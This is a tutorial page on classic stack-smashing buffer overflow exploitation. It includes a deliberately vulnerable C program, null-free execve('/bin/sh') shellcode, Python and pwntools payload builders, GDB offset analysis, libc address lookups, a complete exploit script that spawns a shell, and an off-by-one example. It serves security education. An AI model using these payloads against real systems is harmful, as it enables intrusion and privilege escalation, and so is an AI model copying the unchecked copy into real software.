In 1996, Elias Levy (known as Aleph One) published "Smashing the Stack for Fun and Profit" in Phrack Magazine—an underground hacker publication. This seminal article didn't invent stack smashing attacks, but it codified them so clearly that it became the canonical reference for a generation of security researchers and attackers alike.
The title was apt. Stack smashing wasn't just powerful—it was elegant. A carefully crafted string of bytes, sent to a vulnerable program, could rewrite the very fabric of its execution flow. The program's own stack, its trusted workspace for function calls, became the weapon used against it.
In this page, we dissect the mechanics of stack smashing with surgical precision. You'll understand exactly how an overflow becomes an exploit, byte by byte, address by address.
By the end of this page, you will understand: the exact structure of exploit payloads, how return addresses are located and overwritten, the role of NOP sleds and shellcode placement, handling practical challenges like null bytes and alignment, and how to calculate offsets for reliable exploitation.
Let's establish the canonical vulnerable program and trace exactly how an attacker exploits it. We'll use a slightly expanded version of our earlier example:
```c
#include <stdio.h>
#include <string.h>

// Simulates reading input from network/file/user
void process_request(char *request) {
    char buffer[128];           // 128 bytes allocated
    int request_type = 0;       // Local variable after buffer

    // VULNERABLE: No bounds checking on copy
    strcpy(buffer, request);    // Copy until null terminator

    if (request_type == 1) {
        printf("Processing admin request...\n");
    } else {
        printf("Received: %s\n", buffer);
    }
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <request>\n", argv[0]);
        return 1;
    }

    printf("Server processing request...\n");
    process_request(argv[1]);
    printf("Request complete.\n");

    return 0;
}
```
The Stack Layout When process_request Executes
When main calls process_request(argv[1]), the stack is arranged as follows (x86-64 architecture, simplified):
| Stack Address | Content | Size | Purpose |
|---|---|---|---|
| RSP+0x00 | buffer[0..7] | 8 bytes | Start of vulnerable buffer |
| RSP+0x08 | buffer[8..15] | 8 bytes | ... |
| ... | ... | ... | ... |
| RSP+0x78 | buffer[120..127] | 8 bytes | End of 128-byte buffer |
| RSP+0x80 | request_type | 4 bytes | Local variable (int) |
| RSP+0x84 | Padding | 4 bytes | Alignment padding |
| RSP+0x88 | Saved RBP | 8 bytes | Caller's frame pointer |
| RSP+0x90 | Return Address | 8 bytes | ⚠️ Address in main() to return to |
| RSP+0x98 | main's stack frame... | ... | Caller's context |
The Attack Path
If we provide input longer than 128 bytes:
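- Bytes 0-127 fill buffer (as intended)
- Bytes 128-131 overwrite request_type
- Bytes 132-135 overwrite the alignment padding
- Bytes 136-143 overwrite the saved RBP
- Bytes 144-151 overwrite the return address
When process_request executes its epilogue (leave; ret), the CPU:
- Restores RSP from RBP and pops the saved RBP, which now holds our bytes
- Pops the overwritten return address into RIP and jumps to it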
We now control where the program executes next.
The exact offset from buffer start to return address depends on: buffer size, local variable sizes, compiler padding/alignment decisions, calling convention, and architecture (32-bit vs 64-bit). These values must be determined empirically through debugging or pattern analysis—they're not purely predictable from source code.
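For the simplified layout in the table above, the offset can at least be sanity-checked by adding up the field sizes. The following is a minimal sketch under that assumption; the names FRAME_LAYOUT, region_offsets, and region_at are illustrative, and a real binary's layout still has to be confirmed in a debugger.

```python
# Simplified frame layout taken from the table above: (name, size in bytes),
# listed from the lowest address (start of buffer) upward.
FRAME_LAYOUT = [
    ("buffer", 128),
    ("request_type", 4),
    ("padding", 4),
    ("saved RBP", 8),
    ("return address", 8),
]


def region_offsets(layout):
    """Return {name: (start, end)} byte offsets relative to the buffer start."""
    offsets = {}
    position = 0
    for name, size in layout:
        offsets[name] = (position, position + size)
        position += size
    return offsets


def region_at(layout, index):
    """Name the region that input byte `index` lands in, or None if beyond the frame."""
    for name, (start, end) in region_offsets(layout).items():
        if start <= index < end:
            return name
    return None


offsets = region_offsets(FRAME_LAYOUT)
offset_to_ret = offsets["return address"][0]
print(f"Offset to return address: {offset_to_ret} (0x{offset_to_ret:x})")
print(f"Input byte 130 lands in: {region_at(FRAME_LAYOUT, 130)}")
```

The result matches the RSP+0x90 row of the table. If the compiler reorders locals or adds padding, only the FRAME_LAYOUT entries change.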
A stack smashing exploit payload is more than just "a lot of data followed by an address." Professional exploit development requires understanding each component's purpose and the constraints that shape payload construction.
Component 1: NOP Sled (Landing Zone)
The NOP (No OPeration) sled consists of many NOP instructions (opcodes like \x90 on x86). Its purpose is to increase the target area for the redirected execution.
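Why is this necessary? Small variations in memory layout (environment variables, argument lengths, running inside or outside a debugger) shift the stack by tens or hundreds of bytes, so we often can't predict the exact address of our shellcode. If we aim for the middle of a NOP sled instead of the shellcode start, we have a much larger margin of error. Execution slides down the NOPs until it reaches the shellcode. A sled only absorbs small shifts like these; it does not defeat full ASLR (Address Space Layout Randomization) on 64-bit systems, where the randomization range far exceeds any practical sled size.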
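The margin of error a sled buys can be put in numbers. The sketch below is a hedged model rather than a measurement: it assumes we aim at the middle of where we guess the sled is, and asks how far the real sled may have shifted before the jump misses it. The helper names lands_in_sled and tolerated_shifts are illustrative.

```python
def lands_in_sled(target_addr, sled_start, sled_len):
    """True if a jump to target_addr falls on one of the sled's NOP bytes."""
    return sled_start <= target_addr < sled_start + sled_len


def tolerated_shifts(sled_len, search=1024):
    """Return (lowest, highest) shift of the real sled start, relative to the
    guessed start, that still lands on a NOP when aiming at the guessed middle."""
    guessed_start = 0  # only relative distances matter in this model
    target = guessed_start + sled_len // 2
    ok = [
        shift
        for shift in range(-search, search + 1)
        if lands_in_sled(target, guessed_start + shift, sled_len)
    ]
    return min(ok), max(ok)


for sled_len in (1, 64, 100):
    low, high = tolerated_shifts(sled_len)
    print(f"sled of {sled_len:3d} bytes tolerates shifts from {low} to {high}")
```

A one-byte "sled" tolerates no shift at all, while a 64-byte sled tolerates roughly 32 bytes in either direction. That is enough for environment differences, but negligible against the randomization range of ASLR.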
Component 2: Shellcode (Payload)
Shellcode is the actual malicious machine code. Common shellcode types:
- Shell spawning: execute /bin/sh (local privilege escalation)
Component 3: Padding
Filler bytes that extend the payload to the exact offset of the return address. Recognizable patterns like AAAA... are common during development and are then replaced with NOP bytes or junk in the final exploit.
Component 4: Return Address
The address that overwrites the saved return address on the stack. This must point back into our NOP sled or directly to our shellcode. Getting this right is the crux of reliable exploitation.
```python
#!/usr/bin/env python3
"""
Classic stack smashing exploit structure
Target: vulnerable.c compiled without protections
Architecture: x86-64 Linux
"""

# Configuration
buffer_size = 128
local_vars_size = 8    # request_type + padding
saved_rbp_size = 8
offset_to_ret = buffer_size + local_vars_size + saved_rbp_size  # 144 bytes

# Component 1: NOP sled (landing zone)
NOP = b"\x90"
nop_sled = NOP * 64    # 64 NOPs for landing area

# Component 2: Shellcode - execve("/bin/sh", NULL, NULL)
# This is 24-byte x86-64 Linux shellcode (example).
# It is abbreviated: it neither pushes a terminator after the string nor
# clears the upper bytes of RAX, so it relies on both already being zero.
# The full null-free listing later on this page handles both.
shellcode = (
    b"\x48\x31\xf6"                # xor rsi, rsi
    b"\x48\xbf\x2f\x62\x69\x6e"    # movabs rdi, '/bin//sh'
    b"\x2f\x2f\x73\x68"
    b"\x57"                        # push rdi
    b"\x48\x89\xe7"                # mov rdi, rsp
    b"\x48\x31\xd2"                # xor rdx, rdx
    b"\xb0\x3b"                    # mov al, 59 (execve syscall)
    b"\x0f\x05"                    # syscall
)

# Component 3: Padding to reach return address
current_length = len(nop_sled) + len(shellcode)
padding_needed = offset_to_ret - current_length
padding = b"A" * padding_needed

# Component 4: Return address (pointing into NOP sled)
# This address must be determined empirically!
# Example: stack address during debugging
return_addr = 0x7fffffffdea0  # MUST be adjusted per target
ret_addr_bytes = return_addr.to_bytes(8, 'little')

# Construct final payload
payload = nop_sled + shellcode + padding + ret_addr_bytes

print(f"Payload size: {len(payload)} bytes")
print(f"NOP sled: {len(nop_sled)} bytes")
print(f"Shellcode: {len(shellcode)} bytes")
print(f"Padding: {len(padding)} bytes")
print(f"Return address: {hex(return_addr)}")

# Write payload to file or use directly
with open("payload.bin", "wb") as f:
    f.write(payload)
```
Shellcode must avoid bytes that would terminate the copy (null bytes for strcpy, newlines for gets), be position-independent (no hardcoded absolute addresses), fit within the available buffer space, and work on the target architecture/OS. Writing reliable shellcode is an art in itself.
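The first of these constraints is easy to check mechanically. The sketch below scans a byte string for bytes that would end the copy early; BAD_BYTES and find_bad_bytes are illustrative names, and the two sample encodings (mov eax, 0x3b and push 0x3b; pop rax) are included only to show a failing and a passing case.

```python
# Bytes that end the copy early, keyed by the copying function.
# strcpy stops at NUL; gets stops at a newline.
BAD_BYTES = {
    "strcpy": b"\x00",
    "gets": b"\n",
}


def find_bad_bytes(data, bad):
    """Return a list of (offset, byte_value) for every bad byte found in data."""
    return [(offset, value) for offset, value in enumerate(data) if value in bad]


with_nulls = bytes.fromhex("b83b000000")  # mov eax, 0x3b
null_free = bytes.fromhex("6a3b58")       # push 0x3b ; pop rax

print(find_bad_bytes(with_nulls, BAD_BYTES["strcpy"]))
print(find_bad_bytes(null_free, BAD_BYTES["strcpy"]))
```

An empty list means the bytes survive the copy intact. Any hit gives the offset at which the copy would stop.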
Determining the exact offset from the buffer start to the return address is crucial. Too short, and we don't overwrite it; too long, and we corrupt memory beyond, potentially crashing before we gain control. Several techniques are used:
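- Pattern generation: Create a unique, non-repeating pattern (Aa0Aa1Aa2...). Feed it to the program, and when it crashes, the overwritten return address contains a unique substring. On 32-bit x86 that value ends up in EIP; on x86-64 a non-canonical address never reaches RIP, so read it from the top of the stack at the faulting ret instead. Look up that substring to find the exact offset.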
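The Aa0Aa1Aa2 pattern is simple enough to generate and search without extra tooling. The following is a minimal standard-library sketch; make_pattern and find_offset are illustrative names, and the "crash value" is simulated by reading eight bytes back out of the pattern rather than taken from a real crash.

```python
import string


def make_pattern(length):
    """Build an Aa0Aa1...Aa9Ab0... pattern truncated to `length` bytes."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    return "".join(chunks)[:length].encode()


def find_offset(pattern, crash_value, width=8):
    """Locate the little-endian bytes of crash_value in pattern; -1 if absent."""
    needle = crash_value.to_bytes(width, "little")
    return pattern.find(needle)


pattern = make_pattern(200)

# Simulate the value a debugger would show where the return address was:
# the eight pattern bytes that happened to land at offset 144.
simulated_crash_value = int.from_bytes(pattern[144:152], "little")

print(pattern[:12])
print(find_offset(pattern, simulated_crash_value))
```

Because uppercase letters, lowercase letters, and digits each occupy fixed positions modulo 3, any window of four or more bytes identifies its offset unambiguously within the pattern's length limit.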
```python
#!/usr/bin/env python3
"""
Pattern-based offset discovery using pwntools
"""

from pwn import *

# Generate a cyclic pattern of 200 bytes
pattern = cyclic(200)  # Creates 'aaaabaaacaaadaaaeaaa...'
print(f"Pattern: {pattern[:50]}...")

# After crash, if RIP = 0x6161616a ('jaaa' in little-endian)
# Find the offset:
crash_value = 0x6161616a
offset = cyclic_find(crash_value)
print(f"Offset to return address: {offset} bytes")

# Alternative: Find from substring
# If crash shows RIP contains 'jaaa':
offset_str = cyclic_find(b'jaaa')
print(f"Offset (from string): {offset_str}")

# Example using pwntools for complete exploit development
context.arch = 'amd64'
context.os = 'linux'

# Create exploit payload once offset is known
def create_exploit(offset, target_addr):
    payload = b"A" * offset       # Fill to return address
    payload += p64(target_addr)   # Overwrite with target
    return payload

# Generate pattern file for manual testing
with open("pattern.txt", "wb") as f:
    f.write(pattern)

print("\n[*] Feed pattern.txt to vulnerable program")
print("[*] On crash, check register values or core dump")
print("[*] Use cyclic_find(crash_value) to get offset")
```
Practical Demonstration with GDB
Here's how to find the offset using a debugger:
```
$ gdb -q ./vulnerable
(gdb) set disable-randomization on  # Disable ASLR for testing
(gdb) break process_request
(gdb) run AAAAAAAAAAAAtest

# At breakpoint, examine stack layout (simplified, annotated output):
(gdb) info frame
Stack level 0, frame at 0x7fffffffe000:
 rip = 0x401196 in process_request; saved rip = 0x401223
 called by frame at 0x7fffffffe020

(gdb) x/20gx $rsp
0x7fffffffdf68: 0x0000000000000000 0x0000000000000000  <- buffer starts
0x7fffffffdf78: 0x0000000000000000 0x0000000000000000
...
0x7fffffffdfe0: 0x0000000000000000  <- buffer ends (128 bytes)
0x7fffffffdfe8: 0x0000000000000000  <- request_type + padding
0x7fffffffdff0: 0x00007fffffffe010  <- saved RBP
0x7fffffffdff8: 0x0000000000401223  <- return address (144 bytes from start)

# Calculate: buffer at 0x7fffffffdf68, ret addr at 0x7fffffffdff8
# Offset = 0x7fffffffdff8 - 0x7fffffffdf68 = 0x90 = 144 bytes
# (Note: Actual offset may vary based on compilation)

(gdb) x/gx $rbp+8
0x7fffffffdff8: 0x0000000000401223  # Confirms return address location

# Now we know: 144 bytes to reach return address
```
Different compilers, optimization levels, and even compiler versions can produce different stack layouts. An exploit developed against a binary built with GCC 9 might fail against one built with GCC 11 due to different alignment decisions. Always test exploits against the exact target binary.
One of the most significant constraints in exploit development is handling null bytes (\x00). String functions like strcpy, strcat, and sprintf (with %s) treat null bytes as string terminators. If your payload contains a null byte, the copy stops there, and the rest of your payload never reaches its destination. (gets is different: it passes null bytes through and stops at a newline instead.)
- Problem: mov eax, 0 contains nulls
- Fix: use xor eax, eax instead of mov eax, 0
```nasm
; PROBLEM: This shellcode contains null bytes
; mov eax, 0x0000003b    ; 3b 00 00 00 - THREE null bytes!
; mov rdi, 0             ; Contains nulls

; SOLUTION: Null-free equivalents

; Instead of: mov eax, 0
xor eax, eax             ; Zero register without null bytes

; Instead of: mov rax, 0
xor rax, rax

; Instead of: mov eax, 59 (execve = 59 = 0x3b)
push 59
pop rax                  ; Avoid null bytes in immediate

; Instead of: mov rdi, address_with_nulls
; Use stack to build strings:
xor rdi, rdi
push rdi                 ; Push null terminator
mov rdi, 0x68732f2f6e69622f  ; '/bin//sh' (8 bytes, no nulls)
push rdi
mov rdi, rsp             ; Point RDI to our string

; Instead of: mov rsi, 0
xor rsi, rsi             ; NULL for argv

; Instead of: mov rdx, 0
xor rdx, rdx             ; NULL for envp

; Full null-free execve shellcode for x86-64:
; xor rsi, rsi           ; argv = NULL
; push rsi               ; null terminator for string
; mov rdi, 0x68732f2f6e69622f  ; '/bin//sh'
; push rdi
; mov rdi, rsp           ; pointer to '/bin//sh'
; xor rdx, rdx           ; envp = NULL
; push 59
; pop rax                ; syscall number for execve
; syscall
```
The 64-bit Address Challenge
On 64-bit systems, virtual addresses for user space are typically in the range of 0x00007fffffffffff and below. This means the upper two bytes of every user-space address are null!
For example, a stack address like 0x00007fffffffdea0 contains TWO null bytes at the front.
Solutions for 64-bit:
- Rely on implicit null bytes: The saved return address being overwritten is itself a user-space address, so its upper two bytes are already zero. Write only the six low-order bytes of the new address, let strcpy's terminator land on the seventh, and the full 8-byte value is correct. This works only if the address is the last element of the payload; nothing can follow it.
- Use addresses in lower regions: Code in a non-PIE binary sits at low addresses such as 0x401223. Their null bytes are again all in the upper positions, so only the few low-order non-null bytes need to be written.
- Pivoting techniques: Use return-oriented programming (covered later) to avoid needing clean addresses in your initial payload.
- Exploit different vulnerability types: read() and memcpy() don't treat null bytes specially, so exploits using these are not constrained.
On little-endian systems (x86, x86-64), multi-byte values are stored with the least significant byte first. For the address 0x00007fffffffdea0, the bytes in memory are: a0 de ff ff ff 7f 00 00. The null bytes come LAST. If we're overwriting just enough to reach the return address and leverage implicit nulls, we only need to write the first 6 non-null bytes.
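The byte order is easy to confirm for yourself. This short sketch packs the example address from the text and strips the trailing nulls to show which bytes a string copy actually has to deliver; writable_prefix is an illustrative helper name.

```python
def writable_prefix(address, width=8):
    """Little-endian bytes of `address` with the trailing (upper) null bytes removed."""
    return address.to_bytes(width, "little").rstrip(b"\x00")


address = 0x00007FFFFFFFDEA0
raw = address.to_bytes(8, "little")
prefix = writable_prefix(address)

print(raw.hex(" "))     # a0 de ff ff ff 7f 00 00
print(prefix.hex(" "))  # a0 de ff ff ff 7f
print(len(prefix), "bytes need to be written;", b"\x00" in prefix)
```

The same helper shows why a low address such as 0x401223 needs only three bytes. Note that an address with a null in one of its low-order positions (for example 0x7fffffff00a0) would still be cut short by strcpy.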
Once we control the return address, we need to redirect it somewhere useful. The target depends on what we want to execute and what addresses are available.
- Return-to-libc: call system() with /bin/sh as argument. Doesn't require executable stack.
Finding Usable Addresses
In the absence of ASLR (or if ASLR is bypassed/weak), addresses are predictable:
| Source | Typical Address Range | ASLR Status | Use Case |
|---|---|---|---|
| Main binary (.text) | 0x400000 - 0x4fffff | Often not randomized (PIE off) | ROP gadgets, direct function calls |
| Stack | 0x7fff00000000+ | Randomized by default | Shellcode (if executable) |
| Heap | Varies | Partially randomized | Heap spray, object corruption |
| libc | Varies | Randomized (high entropy) | return-to-libc, ROP gadgets |
| Shared libraries | Varies | Randomized | Additional gadgets, functions |
```bash
#!/bin/bash
# Reconnaissance: Finding useful addresses

# Check if PIE (Position Independent Executable) is enabled
checksec --file=./vulnerable
# Output: PIE: No means main binary addresses are fixed

# Find libc base address (ASLR disabled or using info leak)
ldd ./vulnerable
# libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c00000)

# Find 'system' function address in libc
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep "system"
# system@@GLIBC_2.2.5 at offset 0x50d70

# Find '/bin/sh' string in libc
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
# 0x1d8678 /bin/sh

# Calculate absolute addresses (libc_base + offset):
# system:    0x00007ffff7c00000 + 0x50d70  = 0x7ffff7c50d70
# "/bin/sh": 0x00007ffff7c00000 + 0x1d8678 = 0x7ffff7dd8678

# Find useful ROP gadgets in binary
ROPgadget --binary ./vulnerable | head -20

# Check memory layout of running process
cat /proc/$(pgrep vulnerable)/maps
```
With ASLR enabled, library and stack addresses change each run. Exploits must either: (1) Leak an address first to calculate targets, (2) Use fixed addresses from non-PIE binaries, (3) Brute-force a small entropy space (32-bit has only ~12-16 bits of entropy), or (4) Use format string or other bugs to read memory before exploiting.
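The base-plus-offset arithmetic from the script comments, and its inverse for the leak case, can be sketched as follows. The base and offsets are the example values shown above and will differ for any other libc build; resolve and base_from_leak are illustrative names.

```python
# Example values copied from the reconnaissance output above.
LIBC_BASE = 0x00007FFFF7C00000
SYMBOL_OFFSETS = {
    "system": 0x50D70,
    "/bin/sh": 0x1D8678,
}


def resolve(base, offsets):
    """Turn file offsets into absolute addresses for a given load base."""
    return {name: base + offset for name, offset in offsets.items()}


def base_from_leak(leaked_addr, symbol_offset):
    """Recover the load base from one leaked symbol address."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        # Load bases are page-aligned; anything else means a wrong offset or leak.
        raise ValueError("computed base is not page-aligned")
    return base


addresses = resolve(LIBC_BASE, SYMBOL_OFFSETS)
for name, addr in addresses.items():
    print(f"{name:8s} -> {hex(addr)}")

# With ASLR, the same offsets apply to whatever base a leak reveals.
recovered = base_from_leak(addresses["system"], SYMBOL_OFFSETS["system"])
print(hex(recovered))
```

The page-alignment check is a cheap sanity test: a leaked address paired with an offset from the wrong libc version usually fails it.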
Let's walk through a complete stack smashing exploit development process against our vulnerable program, assuming a system without modern protections (for educational purposes).
```python
#!/usr/bin/env python3
"""
Complete stack smashing exploit for vulnerable.c
Environment: x86-64 Linux, ASLR disabled, DEP disabled, no stack canaries
Compile target: gcc -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
"""

import struct
import subprocess

# =========================================
# STEP 1: Determine offset to return address
# =========================================
# From pattern analysis or debugging: 144 bytes to return address
OFFSET_TO_RET = 144

# =========================================
# STEP 2: Develop null-free shellcode
# =========================================
# x86-64 Linux execve("/bin/sh") shellcode (24 bytes, no null bytes)
# Abbreviated form: see the full null-free listing earlier on this page,
# which also pushes a string terminator and sets RAX via push/pop.
shellcode = bytes([
    0x48, 0x31, 0xf6,                    # xor rsi, rsi
    0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e,  # movabs rdi, '/bin//sh'
    0x2f, 0x2f, 0x73, 0x68,
    0x57,                                # push rdi
    0x48, 0x89, 0xe7,                    # mov rdi, rsp
    0x48, 0x31, 0xd2,                    # xor rdx, rdx
    0xb0, 0x3b,                          # mov al, 59
    0x0f, 0x05                           # syscall
])

# =========================================
# STEP 3: Find target address
# =========================================
# With GDB, we found buffer starts at approximately 0x7fffffffdcc0
# We'll aim for middle of NOP sled for reliability
NOP_SLED_SIZE = 100
TARGET_ADDR = 0x7fffffffdcc0 + (NOP_SLED_SIZE // 2)

# =========================================
# STEP 4: Construct the payload
# =========================================
def build_payload():
    payload = b""

    # NOP sled - landing zone (100 bytes)
    payload += b"\x90" * NOP_SLED_SIZE

    # Shellcode (24 bytes)
    payload += shellcode

    # Current payload size
    current_size = len(payload)  # 124 bytes

    # Padding to reach return address (20 bytes to reach 144)
    padding_needed = OFFSET_TO_RET - current_size
    payload += b"A" * padding_needed

    # Return address (little-endian)
    # The upper 2 bytes are nulls, which cannot be passed in argv and
    # would stop strcpy anyway. We send only the low 6 bytes; the upper
    # 2 bytes of the saved return address are already zero.
    payload += struct.pack("<Q", TARGET_ADDR)[:6]

    return payload

# =========================================
# STEP 5: Execute the exploit
# =========================================
def main():
    payload = build_payload()

    print(f"[*] Payload size: {len(payload)} bytes")
    print(f"[*] NOP sled: {NOP_SLED_SIZE} bytes")
    print(f"[*] Shellcode: {len(shellcode)} bytes")
    print(f"[*] Target address: {hex(TARGET_ADDR)}")
    print(f"[*] Offset to return: {OFFSET_TO_RET}")

    # Verify no nulls in critical portion
    critical_portion = payload[:OFFSET_TO_RET]
    if b'\x00' in critical_portion:
        print("[!] Warning: Null byte in payload before return address!")
        null_pos = critical_portion.find(b'\x00')
        print(f"[!] Null at offset: {null_pos}")

    # Write payload for manual testing
    with open("payload.bin", "wb") as f:
        f.write(payload)
    print("[*] Payload written to payload.bin")

    # Execute (WARNING: Only in controlled environment!)
    print("[*] Launching exploit...")
    try:
        # Run vulnerable program with our payload
        result = subprocess.run(
            ["./vulnerable", payload],
            timeout=5
        )
    except Exception as e:
        print(f"[*] Execution resulted in: {e}")
        print("[*] If you see a shell prompt, the exploit succeeded!")

if __name__ == "__main__":
    main()
    print("\n[*] If successful, you should have a shell.")
    print("[*] Type 'id' or 'whoami' to verify.")
```
Execution Flow After Successful Exploit
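1. main() calls process_request(payload)
2. strcpy copies payload into buffer, overflowing 144+ bytes
3. process_request reaches its epilogue and executes leave; ret
4. ret loads the overwritten return address, and execution slides down the NOP sled into the shellcode
5. The shellcode calls execve("/bin/sh", NULL, NULL)
If the process ran as root (e.g., a setuid binary or privileged daemon), we now have a root shell.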
This relatively simple technique—overwriting a return address—transforms a memory corruption bug into arbitrary code execution. The combination of predictable memory layout, lack of bounds checking, and executable stacks made this attack devastatingly effective for decades.
One of the most fascinating aspects of stack smashing is that even a single-byte overflow can be enough for exploitation. Off-by-one errors—where a loop writes exactly one byte past the buffer—are common and surprisingly exploitable.
```c
#include <stddef.h>

char *get_user_input(void);  // Hypothetical helper, assumed to be defined elsewhere

// Classic off-by-one vulnerability
void copy_string(char *dest, const char *src, size_t size) {
    size_t i;
    // Bug: Loop condition uses <= instead of <
    // Allows writing one byte past buffer end
    for (i = 0; i <= size; i++) {  // WRONG: should be i < size
        dest[i] = src[i];
        if (src[i] == '\0') break;
    }
}

void vulnerable() {
    char buffer[64];
    char *input = get_user_input();  // Returns 64+ byte string

    copy_string(buffer, input, 64);
    // If input is 64 bytes + null, we write buffer[64] = '\0'
    // If buffer sits directly below the saved RBP,
    // this overwrites one byte of saved RBP!
}
```
How One Byte Becomes Code Execution
The off-by-one overwrites the least significant byte of the saved frame pointer (RBP). This might seem useless, but consider:
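When the function returns, it executes leave, which does:
- mov rsp, rbp: RSP is reset to the function's own frame base, which is still intact
- pop rbp: RBP is loaded with the saved value whose low byte we corrupted
The caller also executes leave; ret:
- leave copies the corrupted RBP into RSP, so the stack now follows the corrupted frame chain
- ret pops a return address from a memory location we influenced
In the example above the overwritten byte is always 0x00, which moves the saved frame pointer down by up to 255 bytes, often into our buffer. If we carefully control what lies at that location, the frame points into our buffer, where we've placed a controlled return address.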
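This is called "Frame Pointer Overwrite" or "Off-by-One Stack Pivot".
The attack requires:
- A buffer located directly below the saved frame pointer, so the extra byte lands on its least significant byte
- Attacker-controlled data at the address the corrupted frame pointer ends up pointing to
- A caller that restores its stack from RBP (leave; ret) before returning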
This demonstrates that security margins matter: even one byte of overflow, in the right place, compromises the system.
Off-by-one bugs are among the most commonly found vulnerabilities in code audits. They're easy to introduce (fence-post errors are a classic programming mistake) and often dismissed as 'just one byte.' But as we've seen, one byte can be enough. Always audit loop bounds and buffer size calculations with extreme care.
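The effect of that single byte can be modeled without touching real memory. The sketch below simulates the buggy loop on a bytearray that stands in for the 64-byte buffer followed by the saved RBP. The saved RBP value is a made-up example, and adjacency of the two is an assumption that a real compiler may not honor.

```python
def copy_string(dest, src, size):
    """Python rendering of the buggy C loop: `<=` permits a write at dest[size]."""
    for i in range(size + 1):  # mirrors `i <= size`
        dest[i] = src[i]
        if src[i] == 0:
            break


BUF_SIZE = 64
SAVED_RBP = 0x00007FFFFFFFE010  # hypothetical value, for illustration only

# Simulated stack: the buffer, immediately followed by the saved RBP.
frame = bytearray(BUF_SIZE) + bytearray(SAVED_RBP.to_bytes(8, "little"))

user_input = b"A" * BUF_SIZE + b"\x00"  # 64 bytes plus terminator
copy_string(frame, user_input, BUF_SIZE)

corrupted_rbp = int.from_bytes(frame[BUF_SIZE:], "little")
print(f"saved RBP before: {hex(SAVED_RBP)}")
print(f"saved RBP after:  {hex(corrupted_rbp)}")
print(f"frame pointer moved down by {SAVED_RBP - corrupted_rbp} bytes")
```

Because the low byte is forced to zero, the frame pointer can only move toward lower addresses, by at most 255 bytes. Changing the loop bound to `range(size)` leaves the saved value untouched, which is the one-character fix the C code needs.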
We've dissected the mechanics of stack smashing, the foundational exploitation technique for buffer overflows.
What's Next: Code Injection
The next page explores code injection in depth—the development of shellcode, techniques for encoding payloads to bypass filters, and the art of writing position-independent malicious code. We'll examine how attackers craft the payload that executes once they've redirected control flow.
You now understand the precise mechanics of stack smashing attacks: how return addresses are located and overwritten, how exploit payloads are structured, and the practical challenges of reliable exploitation. This foundation is essential for understanding both advanced exploitation techniques and the defenses designed to stop them.